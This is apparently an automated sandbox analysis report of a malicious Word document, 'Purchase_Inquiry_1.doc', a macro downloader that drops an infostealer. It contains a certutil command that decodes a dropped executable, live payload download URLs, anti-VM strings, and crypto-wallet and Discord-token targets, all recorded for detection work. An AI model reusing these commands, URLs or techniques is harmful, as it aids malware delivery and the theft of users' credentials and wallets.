          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 936Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 1449Jump to behavior
          Source: C:\Windows\SysWOW64\certutil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i19ag96bvk.exeJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7792Thread sleep count: 936 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7792Thread sleep count: 1449 > 30Jump to behavior
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-ga
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuser
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvc
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservice+discordtokenprotector
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvc
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretray
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior

          Stealing of Sensitive Information

          barindex
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
          Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: BytecoinJaxx!com.liberty.jaxx
          Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus
          Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
          Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Source: Yara matchFile source: 14.2.certutil.exe.910a78.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.certutil.exe.910a78.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: certutil.exe PID: 7756, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information421
          Scripting          		Valid Accounts23
          Exploitation for Client Execution          		421
          Scripting          		11
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Security Software Discovery          		Remote Services1
          Data from Local System          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		LSASS Memory1
          Virtualization/Sandbox Evasion          		Remote Desktop ProtocolData from Removable Media3
          Non-Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Virtualization/Sandbox Evasion          		Security Account Manager1
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive113
          Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Timestomp          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials12
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Purchase_Inquiry_1.doc53%VirustotalBrowse
          Purchase_Inquiry_1.doc47%ReversingLabsScript-Macro.Trojan.Jeki
          Purchase_Inquiry_1.doc100%AviraHEUR/Macro.Downloader.ARJJ.Gen

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://portalsphere.free.fr/phUploader/uploads/1741130958.zip0%Avira URL Cloudsafe
          http://portalsphere.free.fr/phUploader/uploads/1741111253.zip0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          perso154-g5.free.fr
          		212.27.63.154
          		truefalse
            		high
            s-0005.dual-s-dc-msedge.net
            		52.123.131.14
            		truefalse
              		high
              portalsphere.free.fr
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://portalsphere.free.fr/phUploader/uploads/1741130958.ziptrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://discord.com/api/v10/users/certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://portalsphere.free.fr/phUploader/uploads/1741111253.zipPurchase_Inquiry_1.docfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ip-api.com/json/?fiecertutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, i19ag96bvk.exe.13.drfalse
                    		high
                    http://ip-api.com/json/?fields=225545certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, i19ag96bvk.exe.13.drfalse
                        		high
                        https://discordapp.com/api/v9/users/certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/PyDevOG/Divulge-Stealercertutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            212.27.63.154
                            		perso154-g5.free.frFrance
                            		12322PROXADFRfalse

                            General Information

                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1628942
                            Start date and time:2025-03-04 09:49:19 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 39s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:16
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • GSI enabled (VBA)
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Purchase_Inquiry_1.doc
                            Detection:MAL
                            Classification:mal100.spyw.expl.winDOC@18/10@1/1
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .doc
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                            • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.109.89.19, 13.89.179.9, 23.60.203.209, 2.21.65.149, 2.21.65.130, 52.111.236.33, 52.111.236.34, 52.111.236.32, 52.111.236.35, 52.123.131.14, 13.107.253.72, 40.126.31.131, 172.202.163.200
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, weu-azsc-config.officeapps.live.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, roaming.officeapps.live.com, onedscolprdcus09.centralus.cloudapp.azure.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, dual-s-0005-office.config.skype.com, ocsp.digicert.com, login.live.com, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, e26769.dscb.akamaiedge.net, nleditor.osi.office.net,
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            s-0005.dual-s-dc-msedge.nethttps://onedrive.live.com/redir?resid=5BFC62F3074C4120%21116&authkey=%21AOd_yBhC51KgUHc&page=View&wd=target%28Quick%20Notes.one%7C3c69d085-3af0-472e-a78d-4a68e797d5be%2FLOEB%7C8799eb25-cf12-4e70-a243-200cc3374b83%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                            • 52.123.130.14
                            SWIFTXCOPYXXMT103XXUSD17,145.docxGet hashmaliciousUnknownBrowse
                            • 52.123.131.14
                            PurchaseXOrder.docxGet hashmaliciousUnknownBrowse
                            • 52.123.131.14
                            refACH Notice of Automatic Transaction Report For INV1475472784Attn-rockwool.com..msgGet hashmaliciousUnknownBrowse
                            • 52.123.130.14
                            2cd5eb33-2162-4691-6d74-1d8137a5ac49.emlGet hashmaliciousHTMLPhisherBrowse
                            • 52.123.131.14
                            2cd5eb33-2162-4691-6d74-1d8137a5ac49.emlGet hashmaliciousHTMLPhisherBrowse
                            • 52.123.130.14
                            TR Swisslife Request for Timely Document Review and Approval.msgGet hashmaliciousUnknownBrowse
                            • 52.123.131.14
                            SecuriteInfo.com.Other.Malware-gen.10169.30262.xlsxGet hashmaliciousUnknownBrowse
                            • 52.123.130.14
                            SecuriteInfo.com.Other.Malware-gen.10169.30262.xlsxGet hashmaliciousUnknownBrowse
                            • 52.123.130.14
                            Untitled attachment 00010.eml (3.51 KB).msgGet hashmaliciousUnknownBrowse
                            • 52.123.131.14

                            ASNs

